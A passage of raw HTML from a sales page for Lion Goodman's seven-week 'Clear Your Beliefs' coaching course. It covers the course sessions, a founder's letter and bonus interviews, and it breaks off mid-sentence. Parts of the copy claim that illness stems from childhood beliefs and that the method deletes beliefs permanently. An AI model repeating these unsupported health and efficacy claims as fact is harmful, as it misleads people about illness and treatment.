20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a 